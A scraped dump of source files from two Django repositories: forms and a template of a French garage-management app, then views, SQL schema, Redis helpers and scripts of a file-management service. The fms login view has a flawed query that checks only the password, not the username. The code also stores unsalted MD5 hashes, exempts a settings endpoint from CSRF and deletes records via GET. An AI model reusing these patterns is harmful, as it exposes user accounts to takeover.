TextInput(attrs={'class': 'form-control'}),\n 'telephone_client': TextInput(attrs={'class': 'form-control'}),\n 'carte_AFPA_img': FileInput(attrs={'class': 'form-control'})\n } \n\n # Clean suivi du nom du champ concerné ensuite géré dans le Html\n def clean_mail_client(self):\n mail_client = self.cleaned_data['mail_client'].lower()\n r = DonneesPersonnelles.objects.filter(mail_client=mail_client)\n if r.count():\n raise forms.ValidationError(\"Email existe déjà\")\n return mail_client\n\nclass AddressUpdateForm(forms.ModelForm):\n class Meta:\n model = Address\n fields = [\"street\",\"street_number\",\"street_complement\"]\n widgets = {\n 'street': TextInput(attrs={'class': 'form-control'}),\n 'street_number': NumberInput(attrs={'class': 'form-control'}),\n 'street_complement': TextInput(attrs={'class': 'form-control'})\n }\n\nclass AddressForm(forms.ModelForm):\n class Meta:\n model = Address\n fields = [\"street\",\"street_number\",\"street_complement\"]\n widgets = {\n 'street': TextInput(attrs={'class': 'form-control'}),\n 'street_number': NumberInput(attrs={'class': 'form-control'}),\n 'street_complement': TextInput(attrs={'class': 'form-control'})\n }\n\n # Clean suivi du nom du champ concerné ensuite géré dans le Html\n def clean(self):\n cleaned_data = super().clean()\n street_number = self.cleaned_data['street_number']\n street = self.cleaned_data['street']\n r = Address.objects.filter(street_number=street_number,street=street)\n if r.count():\n raise forms.ValidationError(\"l'adresse existe déjà\")\n return cleaned_data\n\nclass ZipCodeForm(forms.ModelForm):\n class Meta:\n model = ZipCode\n fields = [\"zip_code\"]\n widgets = {\n 'zip_code': TextInput(attrs={'class': 'form-control'})\n } \n\nclass CityForm(forms.ModelForm):\n class Meta:\n model = City\n fields = [\"city_name\"]\n widgets = {\n 'city_name': TextInput(attrs={'class': 'form-control'})\n } \n\nclass VoitureForm(forms.ModelForm):\n class Meta:\n model = Voiture\n exclude = ('client', 'carte_grise_img', 'carte_assurance_img', 'type_vehicule' )\n widgets = {\n 'libelle_marque': TextInput(attrs={'class': 'form-control'}),\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n 'immatriculation': TextInput(attrs={'class': 'form-control'}),\n 'vin': TextInput(attrs={'class': 'form-control'}),\n 'kilometrage': NumberInput(attrs={'class': 'form-control'}),\n 
'date_mec': DateInput(attrs={'class': 'form-control'}),\n 'carte_grise_img': FileInput(attrs={'class': 'form-control'}),\n 'carte_assurance_img': FileInput(attrs={'class': 'form-control'})\n }\n\nclass MotoForm(forms.ModelForm):\n class Meta:\n model = Moto\n exclude = ('client', 'carte_grise_img', 'carte_assurance_img', 'type_vehicule' )\n widgets = {\n 'libelle_marque': TextInput(attrs={'class': 'form-control'}),\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n 'immatriculation': TextInput(attrs={'class': 'form-control'}),\n 'vin': TextInput(attrs={'class': 'form-control'}),\n 'kilometrage': NumberInput(attrs={'class': 'form-control'}),\n 'date_mec': DateInput(attrs={'class': 'form-control'}),\n 'carte_grise_img': FileInput(attrs={'class': 'form-control'}),\n 'carte_assurance_img': FileInput(attrs={'class': 'form-control'})\n }\n\nclass VeloForm(forms.ModelForm):\n class Meta:\n model = Velo\n fields = ['libelle_modele']\n widgets = {\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n }\n\nclass InterventionForm(forms.ModelForm):\n class Meta:\n model = Intervention\n exclude = ('intervention_realisee', 'statut', 'utilisateur', 'vehicule', 'date_saisie_intervention')\n widgets = {\n 'date_restitution_prevu': DateInput(attrs={'class': 'form-control'}), \n 'diagnostic' : Textarea(attrs={'class': 'form-control'}), \n 'intervention_a_realiser' : Textarea(attrs={'class': 'form-control'}),\n }\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 15.666666984558105,
"blob_id": "dedb5b74960437b2f221f807b7bbff6e1e9c762b",
"content_id": "868f57ab486e37f32b6904c7fddc6c9bcbda6a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/afpa_meca/business_application.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "BUSINESS_APPLICATION = {\n 'VEHICULE': VOITURE\n}\n"
},
{
"alpha_fraction": 0.38135284185409546,
"alphanum_fraction": 0.3879341781139374,
"avg_line_length": 48.225223541259766,
"blob_id": "b4ee67b7425f733c67df4274b07734dd0f90f8bb",
"content_id": "6ea2a6cf5f6d282a6fcebc149e8096b9cc61b9eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5474,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 111,
"path": "/garage/templates/garage/client_update.html",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "{% extends 'garage/base.html' %}\n{% load static %}\n\n{% block css %}\"{% static 'garage/css/client_form.css' %}\"{% endblock css %}\n\n{% block content %}\n <div class=\"container\">\n \n <titre class=\"col-md-12\">\n <div class=\"col-md-12\">\n <h1 id=\"titre\" class=\"title\">Consultation client</h1>\n </div>\n </titre>\n </br>\n \n <formulaire class=\"col-md-9\">\n <h4>Client</h4>\n <form class=\"needs-validation\" method=\"post\">\n {% csrf_token %}\n <div class=\"row\">\n <div class=\"col-md-6\">\n <div class=\"form-group {% if client_form.nom_client.errors %}has-warning has-feedback{% endif %}\">\n <label for=\"{{ client_form.nom_client.id_for_label }}\" class=\"control-label\">Nom</label>\n {{ form5.nom_client }}\n </div>\n <div class=\"invalid-feedback\">\n Saisie du nom est obligatoire\n </div>\n </div>\n <div class=\"col-md-6\">\n <div class=\"form-group {% if client_form.prenom_client.errors %}has-warning has-feedback{% endif %}\">\n <label for=\"{{ client_form.prenom_client.id_for_label }}\" class=\"control-label\">Prenom</label>\n {{ form5.prenom_client }}\n </div>\n <div class=\"invalid-feedback\">\n Saisie du prenom est obligatoire\n </div>\n </div>\n </div>\n\n <div class=\"row\">\n <div class=\"col-md-6\">\n <label for=\"{{ client_form.numero_afpa_client.id_for_label }}\" class=\"control-label\">Numéro carte AFPA</label>\n {{ form5.numero_afpa_client }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ form.telephone_client.id_for_label }}\" class=\"control-label\">Téléphone</label>\n {{ form4.telephone_client }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ form.mail_client.id_for_label }}\" class=\"control-label\">Email</label>\n {{ form4.mail_client }}\n <div> {{ form4.mail_client.errors }} </div>\n </div>\n </div> \n \n <div class=\"row\">\n <div class=\"col-md-2\">\n <label for=\"{{ address_form.street_number.id_for_label }}\" class=\"control-label\">Numéro de rue :</label>\n {{ form3.street_number }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ address_form.street.id_for_label }}\" class=\"control-label\">Adresse</label>\n {{ form3.street }}\n </div>\n <div class=\"col-md-4\">\n <label for=\"{{ address_form.street_complement.id_for_label }}\" class=\"control-label\">Complement d'adresse</label>\n {{ form3.street_complement }}\n </div>\n </div>\n <div class=\"row\">\n <div class=\"col-md-4\">\n <label for=\"{{ zipCode_form.zip_code.id_for_label }}\" class=\"control-label\">Code Postal</label>\n {{ form.zip_code }}\n </div>\n \n <div class=\"col-md-4\">\n <label for=\"{{ city_form.city_name.id_for_label }}\" class=\"control-label\">Ville</label>\n {{ form2.city_name }}\n </div>\n <div class=\"col-md-4\">\n <label for=\"{{ form.carte_AFPA_img.id_for_label }}\" class=\"control-label\">Carte AFPA img</label>\n {{ form4.carte_AFPA_img }}\n </div>\n </div>\n <div> {{ form3.non_field_errors }} </div>\n\n <div class=\"msgError\"> {{ internal_error }} </div> \n\n <div class=\"row\">\n <div class=\"col-md-3\">\n <a href=\"{% url 'garage:client-select' %}\" class=\"btn btn-primary btn-lg btn-block\" id=\"bouton\">Annuler</a>\n </div>\n <div class=\"col-md-2\">\n </div> \n <div class=\"col-md-4\">\n <button class=\"btn btn-primary btn-lg btn-block\" type=\"submit\" id=\"bouton\">Valider et retour Accueil</button>\n </div> \n <div class=\"col-md-3\">\n <button class=\"btn btn-primary btn-lg btn-block\" type=\"submit\" id=\"bouton\">Etape suivante</button>\n </div>\n </div> \n\n </form>\n\n\n\n </formulaire>\n\n </div>\n {% endblock content %}\n\n \n"
}
] | 8 |
disenQF/fms | https://github.com/disenQF/fms | 109888650d75d380d31cb17cc1a3afe56475a190 | 1a477208b283798f4aa4c8c9d30feb6a10736385 | 3520a97dfc40786387f5a33361d2d9296833b562 | refs/heads/master | 2021-06-30T19:56:36.363337 | 2020-03-09T05:31:14 | 2020-03-09T05:31:14 | 241,790,007 | 1 | 1 | null | 2020-02-20T04:07:59 | 2020-03-09T05:31:12 | 2021-06-10T22:37:11 | CSS | [
{
"alpha_fraction": 0.6395664215087891,
"alphanum_fraction": 0.6449864506721497,
"avg_line_length": 23.600000381469727,
"blob_id": "26d5989a445e0ad12518ebdd49d73813ced8269e",
"content_id": "03052d9f49cc14699ff30876b8426227bd6a3c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/userapp/urls.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('code/', views.send_code),\n path('regist/', views.RegistView.as_view()),\n path('files/', views.FileView.as_view()),\n path('download/', views.download),\n path('create_img_link/', views.create_image_link),\n path('show_img/', views.show_img),\n\n]\n"
},
{
"alpha_fraction": 0.6610169410705566,
"alphanum_fraction": 0.6836158037185669,
"avg_line_length": 18.77777862548828,
"blob_id": "8283696c0a056dba523fde0587a65f27fdadb367",
"content_id": "c095615509c3ee181fe0acad1341347263d6a225",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/fms/__init__.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.template.defaultfilters import register\n\n\[email protected](is_safe=True)\ndef dot_info(value):\n if len(value)>10:\n return value[:10]+'...'\n\n return value"
},
{
"alpha_fraction": 0.5023255944252014,
"alphanum_fraction": 0.7023255825042725,
"avg_line_length": 16.91666603088379,
"blob_id": "ceb5ca506356d4790137f912fa0cc0b8df02b669",
"content_id": "92926fb0a39f891c0c212d0eeda115afd97a3eaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "aliyun-python-sdk-core==2.13.14\nDjango==2.0.1\ndjango-redis==4.11.0\ndjango-tinymce==2.8.0\ngunicorn==20.0.4\njmespath==0.9.4\npycryptodome==3.9.7\nPyMySQL==0.9.3\npytz==2019.3\nredis==3.4.1\nsix==1.14.0\nwebencodings==0.5.1\n"
},
{
"alpha_fraction": 0.5401174426078796,
"alphanum_fraction": 0.553816020488739,
"avg_line_length": 24.549999237060547,
"blob_id": "f41678ecfb97012eb24e556d8331b32d375a6ec9",
"content_id": "3c5d01ce15b8921be36b594f6178b4a3fdd34cc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1022,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/common/file_mime_.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\n\nfrom . import file_types\n\n\ndef get_file_type(mime_type: str):\n if mime_type.startswith('image/'):\n return 1\n elif mime_type.startswith('text/'):\n return 2\n elif mime_type.endswith('.pdf'):\n return 3\n elif mime_type.endswith('.doc') or mime_type.endswith('.docx'):\n return 4\n elif mime_type.endswith('.xls') or mime_type.endswith('.xlsx'):\n return 5\n elif any((mime_type.endswith('.zip'),\n mime_type.endswith('.rar'),\n mime_type.endswith('.tar'),\n mime_type.endswith('.gz'),\n )):\n return 6\n else:\n return 7\n\n\ndef get_file_mime(file_type):\n if file_type == 1:\n return 'image/*'\n elif file_type == 2:\n return 'text/*'\n elif file_type == 3:\n return 'application/pdf'\n elif file_type == 4:\n return 'application/msword'\n elif file_type == 5:\n return 'application/vnd.ms-excel'\n else:\n return 'application/zip'\n"
},
{
"alpha_fraction": 0.8384279608726501,
"alphanum_fraction": 0.8384279608726501,
"avg_line_length": 27.75,
"blob_id": "47565affbaf16303115eebaaeffe4f51db488d19",
"content_id": "365f97566404296449e1d675e5223330823a54f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 8,
"path": "/userapp/models.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom mainapp.models import TUser\nfrom mainapp.models import TFile\nfrom mainapp.models import TGroom\nfrom mainapp.models import TImageLinks\nfrom mainapp.models import TWater"
},
{
"alpha_fraction": 0.5732092261314392,
"alphanum_fraction": 0.574155867099762,
"avg_line_length": 29.921951293945312,
"blob_id": "cf30f9ba4e02c73f57d4d0f178a2a2458108afee",
"content_id": "1d78315cb167b2340a9b7335614c3fa641962b70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6562,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 205,
"path": "/mainapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom common import md5_\nfrom .models import TSysUser, TUser, TSysRole, TMessage\n\nfrom fms import settings\n\n# Create your views here.\ndef login(request):\n # 分两种用户,一个是会员,一个管理员(系统)\n print('--->', request.method)\n if request.method == 'POST':\n print(request.POST)\n\n error = None\n\n username = request.POST['username'].strip()\n password = request.POST['password'].strip()\n remeber = request.POST.get('remeber', '') # checkbox\n\n password_ = md5_.hash_encode(password) # 转成md5后的密文\n\n # 验证用户名和口令是否为空\n if not all((username, password)):\n error = f'用户名或口令不能为空!'\n\n login_user = TSysUser.objects.filter(username=username, auth_string=password_).first()\n if login_user:\n # 系统管理员\n role_ = login_user.role\n login_info = {\n '_id': login_user.id,\n 'name': role_.name,\n 'code': role_.code\n }\n\n else:\n login_user = TUser.objects.filter((Q(name=username) or Q(phone=username)) and Q(auth_string=password)).first()\n if login_user:\n # 会员\n login_info = {\n '_id': login_user.user_id,\n 'name': login_user.name,\n 'code': '',\n 'head': login_user.head,\n 'email': login_user.mail,\n 'phone': login_user.phone\n }\n else:\n error = f'{username} 用户名或口令错误!'\n\n if not error:\n request.session['login_user'] = login_info\n return redirect('/')\n\n return render(request, 'login.html', locals())\n\n\ndef logout(request):\n del request.session['login_user']\n return redirect('/login/')\n\n\n@csrf_exempt\ndef block_settings(request):\n block_default_size = request.POST.get('block_default_size', settings.DEFAULT_BLOCK_SIZE)\n friend_block_size = request.POST.get('friend_block_size', settings.FRIEND_BLOCK_SIZE)\n\n if request.method == 'POST':\n settings.DEFAULT_BLOCK_SIZE = int(block_default_size)\n settings.FRIEND_BLOCK_SIZE = int(friend_block_size)\n\n type_ = request.GET.get('type_', '')\n if type_ == 'ajax':\n return JsonResponse({\n 'block_default_size': block_default_size,\n 'friend_block_size': friend_block_size\n })\n\n return render(request, 'settings.html', locals())\n\ndef index(request):\n return render(request, 'dashboard.html')\n\n\ndef message(request):\n objs = TMessage.objects.all()\n action = request.GET.get('action', '')\n if action == 'del':\n TMessage.objects.get(pk=request.GET.get('id_')).delete()\n\n return render(request, 'message/list.html', locals())\n\n\ndef role(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TSysRole.objects.get(pk=request.GET.get('role_id')).delete()\n\n roles = TSysRole.objects.all()\n return render(request, 'role/list.html', locals())\n\ndef list_sys_user(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TSysUser.objects.get(pk=request.GET.get('id_')).delete()\n\n # 查询系统时,除去超级管理员的用户\n users = TSysUser.objects.filter(~Q(pk=request.session['login_user']['_id'])).all()\n return render(request, 'sys_user/list.html', locals())\n\nclass EditRoleView(View):\n def get(self, request):\n role_id = request.GET.get('role_id', '')\n if role_id:\n role = TSysRole.objects.get(pk=role_id)\n return render(request, 'role/edit.html', locals())\n\n def post(self, request):\n from .forms import RoleForm\n role_id = request.POST.get('id', '')\n if role_id:\n form = RoleForm(request.POST, instance=TSysRole.objects.get(pk=role_id))\n else:\n form = RoleForm(request.POST)\n\n if form.is_valid():\n 
form.save()\n return redirect('/role/')\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'role/edit.html', locals())\n\nclass EditSysUserView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TSysUser.objects.get(pk=id_)\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n return render(request, 'sys_user/edit.html', locals())\n\n def post(self, request):\n from .forms import SysUserForm\n id_ = request.POST.get('id', '')\n if id_:\n form = SysUserForm(request.POST, instance=TSysUser.objects.get(pk=id_))\n else:\n form = SysUserForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/list_sysuser/')\n\n errors = json.loads(form.errors.as_json())\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n\n return render(request, 'sys_user/edit.html', locals())\n\nclass EditMessageView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TMessage.objects.get(pk=id_)\n\n return render(request, 'message/edit.html', locals())\n\n def post(self, request):\n from .forms import MessageForm\n id_ = request.POST.get('id_', '')\n if id_:\n form = MessageForm(request.POST, instance=TMessage.objects.get(pk=id_))\n else:\n form = MessageForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/message/')\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'message/edit.html', locals())\n\n\nclass AuditMessage(View):\n def get(self, request):\n action = request.GET.get('action', '')\n if action:\n obj = TMessage.objects.get(pk=request.GET.get('id_'))\n if action == 'yes':\n obj.state = 1\n elif action == 'no':\n obj.state = 2\n obj.note=request.GET.get('note', '')\n obj.save()\n obj.full_clean() # 将这个持久化对像清除, 如果不清除话,则会影响下一行的查询结果\n\n objs = TMessage.objects.filter(state=0).all()\n return render(request, 'message/list_audit.html', locals())"
},
{
"alpha_fraction": 0.5718954205513,
"alphanum_fraction": 0.5980392098426819,
"avg_line_length": 15.105262756347656,
"blob_id": "83171aefe886821f7d367d9718ecbb877af2f03a",
"content_id": "c94420f24b76c5c49937e1f1085f6c4569057677",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 19,
"path": "/common/cache_.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nimport random\n\nfrom . import rd\n\n\ndef new_code(phone):\n code = set()\n while len(code) < 4:\n code.add(str(random.randint(0, 9)))\n\n code = ''.join(code)\n rd.set(phone, code, ex=120) # 单位是秒\n return code\n\n\ndef get_code(phone):\n return rd.get(phone)\n"
},
{
"alpha_fraction": 0.43826186656951904,
"alphanum_fraction": 0.45116880536079407,
"avg_line_length": 30.981651306152344,
"blob_id": "65980c982fa66dcffa1f9e8c1f3969dd3c68c6f0",
"content_id": "8e011dc9a59b956b2a79d0da9dcc1bccbdafa314",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7137,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 218,
"path": "/media/init.sql",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "drop DATABASE if EXISTS fms;\n\ncreate DATABASE fms CHARSET=utf8;\nuse fms;\n\n\n-- 系统管理员表(超级管理员、普通员管理员、合作商超级管理员)\n\ncreate table t_sys_role(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n name VARCHAR(20) NOT NULL UNIQUE,\n code VARCHAR(10) UNIQUE\n);\n\nINSERT t_sys_role(name, code) values\n ('超级管理员', 'admin'),\n ('普通管理员', 'mgr'),\n ('合作商超级管理员', 'fr_admin');\n\ncreate table t_sys_user(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n username VARCHAR(20) UNIQUE NOT NULL ,\n auth_string VARCHAR(32) NOT NULL,\n nick_name VARCHAR(20),\n role_id INTEGER REFERENCES t_sys_role(id)\n);\n\nINSERT t_sys_user(username, auth_string, nick_name, role_id) VALUES\n ('disen', '43da3eb40a39ddea8d5eb2da915adb09','狄哥', 1),\n ('lili', '8e056ea961370ab19d07993abbb14e73', '小李子', 2);\n\n\n-- 不同角色有自己的菜单\ncreate table t_sys_menu(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n name VARCHAR(20),\n parent_id INTEGER REFERENCES t_sys_menu(id),\n ord INT COMMENT '菜单显示的排序',\n url VARCHAR(50) COMMENT '菜单的连接'\n);\n\n\n-- 角色和菜单关系表\nCREATE TABLE t_sys_role_menu (\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n role_id INTEGER REFERENCES t_sys_role(id),\n menu_id INTEGER REFERENCES t_sys_menu(id)\n);\n\n\n/*==============================================================*/\n/* DBMS name: MySQL 5.0 */\n/* Created on: 2020/2/19 21:09:12 */\n/*==============================================================*/\n\n\ndrop table if exists t_block_setting;\n\ndrop table if exists t_groom;\n\ndrop table if exists t_history;\n\ndrop table if exists t_image_links;\n\ndrop table if exists t_message;\n\ndrop table if exists t_share;\n\ndrop table if exists t_user;\n\ndrop table if exists t_water;\n\ndrop table if exists t_file;\n\n/*==============================================================*/\n/* Table: t_block_setting */\n/*==============================================================*/\ncreate table t_block_setting\n(\n block_id integer not null,\n user_id integer,\n block_size int,\n last_time timestamp,\n note text,\n primary key (block_id)\n);\n\n/*==============================================================*/\n/* Table: t_groom */\n/*==============================================================*/\ncreate table t_groom\n(\n groom_id integer,\n user_id integer,\n friend_id integer\n);\n\n/*==============================================================*/\n/* Table: t_history */\n/*==============================================================*/\ncreate table t_history\n(\n history_id integer not null auto_increment,\n message_id integer,\n user_id integer,\n see_time timestamp,\n see_cnt int,\n primary key (history_id)\n);\n\n/*==============================================================*/\n/* Table: t_image_links */\n/*==============================================================*/\ncreate table t_image_links\n(\n link_id integer not null auto_increment,\n water_id integer,\n file_id integer,\n token varchar(50),\n expires integer,\n create_time char(10),\n primary key (link_id)\n);\n\n/*==============================================================*/\n/* Table: t_message */\n/*==============================================================*/\ncreate table t_message\n(\n message_id integer not null auto_increment,\n title varchar(50),\n content text,\n create_time timestamp,\n link_url varchar(100),\n note text,\n primary key (message_id)\n);\n\n/*==============================================================*/\n/* Table: t_share */\n/*==============================================================*/\ncreate table t_share\n(\n share_id 
integer not null auto_increment,\n    file_id integer,\n    friend_id integer,\n    expires int,\n    primary key (share_id)\n);\n\n/*==============================================================*/\n/* Table: t_user */\n/*==============================================================*/\ncreate table t_user\n(\n    user_id integer not null auto_increment,\n    name varchar(50),\n    auth_string varchar(50),\n    mail varchar(50),\n    phone varchar(50),\n    head varchar(50),\n    label varchar(200),\n    create_time timestamp,\n    note text,\n    primary key (user_id)\n);\n\n/*==============================================================*/\n/* Table: t_water */\n/*==============================================================*/\ncreate table t_water\n(\n    water_id integer auto_increment,\n    water_text VARCHAR(50),\n    water_pos int,\n    font_size int,\n    font_name varchar(20),\n    note text,\n    primary key (water_id)\n);\n\n/*==============================================================*/\n/* Table: t_file */\n/*==============================================================*/\ncreate table t_file\n(\n    file_id integer not null auto_increment,\n    user_id integer,\n    file_type char(1),\n    file_name varchar(50),\n    create_time timestamp,\n    last_time timestamp,\n    file_size float,\n    parent_file_id int,\n    note text,\n    primary key (file_id)\n);\n\nalter table t_block_setting add constraint FK_Reference_5 foreign key (user_id)\n    references t_user (user_id) on delete restrict on update restrict;\n\nalter table t_history add constraint FK_Reference_2 foreign key (message_id)\n    references t_message (message_id) on delete restrict on update restrict;\n\nalter table t_history add constraint FK_Reference_3 foreign key (user_id)\n    references t_user (user_id) on delete restrict on update restrict;\n\nalter table t_image_links add constraint FK_Reference_1 foreign key (water_id)\n    references t_water (water_id) on delete restrict on update restrict;\n\nalter table t_image_links add constraint FK_Reference_4 foreign key (file_id)\n    references t_file (file_id) on delete restrict on update restrict;\n\nalter table t_share add constraint FK_Reference_7 foreign key (file_id)\n    references t_file (file_id) on delete restrict on update restrict;\n\nalter table t_file add constraint FK_Reference_6 foreign key (user_id)\n    references t_user (user_id) on delete restrict on update restrict;\n\n"
},
{
"alpha_fraction": 0.4804156720638275,
"alphanum_fraction": 0.49080735445022583,
"avg_line_length": 22.16666603088379,
"blob_id": "c952a3fea409662b31d392f46220edde4f4b457e",
"content_id": "4335d3998fc9a49ea0fde8b1549cbbcb06db9d7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 54,
"path": "/countapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.http import JsonResponse\nfrom django.db import connection\n\n\n# Create your views here.\n\n\ndef block_cnt(request):\n c = connection.cursor()\n sql = \"\"\"\n SELECT sum(file_size) filesize, month(create_time) month_\n FROM t_file\n GROUP BY month(create_time)\n ORDER BY month_\n \"\"\"\n c.execute(sql)\n data = dict(c.fetchall())\n\n return JsonResponse({\n 'data': {\n 'month': [str(item) + \"月\" for item in data.values()],\n 'values': [round(item / 1024, 2) for item in data.keys()],\n 'x_title': '2020年',\n 'y_title': '空间大小(K)'\n }\n })\n\n\ndef user_cnt(request):\n c = connection.cursor()\n sql = \"\"\"\n SELECT count(user_id) cnt_, month(create_time) month_\n FROM t_user\n GROUP BY month(create_time)\n ORDER BY month_\n \"\"\"\n c.execute(sql)\n data = dict(c.fetchall())\n print(data)\n\n return JsonResponse({\n 'data': {\n 'month': [str(item) + \"月\" for item in data.values()],\n 'values': [\n {\n 'name': str(v)+\"月\",\n 'value': k\n }\n for k, v in data.items()\n ]\n },\n 'x_title': '2020年',\n 'y_title': '用户量'\n })\n"
},
{
"alpha_fraction": 0.6556291580200195,
"alphanum_fraction": 0.6556291580200195,
"avg_line_length": 17.75,
"blob_id": "0abb4195298ce39344ece2c5d2afeed20aecc66e",
"content_id": "5d7c69c1706da2e972dce407007e2bedff28a642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/countapp/urls.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('block/', views.block_cnt),\n path('user/', views.user_cnt),\n\n]\n"
},
{
"alpha_fraction": 0.583518922328949,
"alphanum_fraction": 0.5913140177726746,
"avg_line_length": 27.03125,
"blob_id": "227fd7e2f80da38bac00be596ee43d807212679d",
"content_id": "55256b0599e8c94ea31868d77eb93634d1c5ff81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 32,
"path": "/common/files_stack.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nimport random\n\nfrom . import rd\n\n\ndef add_file_stack(user_id, file_id, file_name):\n v = ','.join([str(file_id), file_name]) # v = f'{file_id},{file_name}'\n is_finded = False\n # 查询当前的v 是否存在,如果存在,则删除其后的value\n for i, pre_v in enumerate(rd.lrange(f'pre_file_id_{user_id}', 0, -1)):\n if v == pre_v:\n is_finded = True\n rd.ltrim(f'pre_file_id_{user_id}', 0, i) # 将后面的内容截断\n\n if not is_finded: # 如果未找到,则压入回退栈中\n rd.rpush(f'pre_file_id_{user_id}', v)\n\n\ndef pop_file_stack(user_id):\n _ = rd.rpop(f'pre_file_id_{user_id}')\n file_id, filename = rd.rpop(f'pre_file_id_{user_id}').split(',')\n return file_id, filename\n\n\ndef get_pre_file_stack(user_id):\n return [tuple(x.split(',')) for x in rd.lrange(f'pre_file_id_{user_id}', 0, -1)]\n\n\ndef clear_pre_file_stack(user_id):\n rd.delete(f'pre_file_id_{user_id}')\n\n"
},
{
"alpha_fraction": 0.5888888835906982,
"alphanum_fraction": 0.6888889074325562,
"avg_line_length": 17,
"blob_id": "9d25878026ee4b2ffe1a3c081fb7cb43d0257176",
"content_id": "e46468d7792c92cfe31cf4baaf1ec0404ba5f329",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd /usr/src\necho \"服务器已启动\"\ngunicorn -w 1 -b 0.0.0.0:8000 fms.wsgi:application\n"
},
{
"alpha_fraction": 0.5654979944229126,
"alphanum_fraction": 0.5668182373046875,
"avg_line_length": 32.74752426147461,
"blob_id": "dc924f2faae75dabe29a72a9fc9d82c2316e3454",
"content_id": "21262cef3fc25dc73685edf6fad726cfcea13b3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7231,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 202,
"path": "/userapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
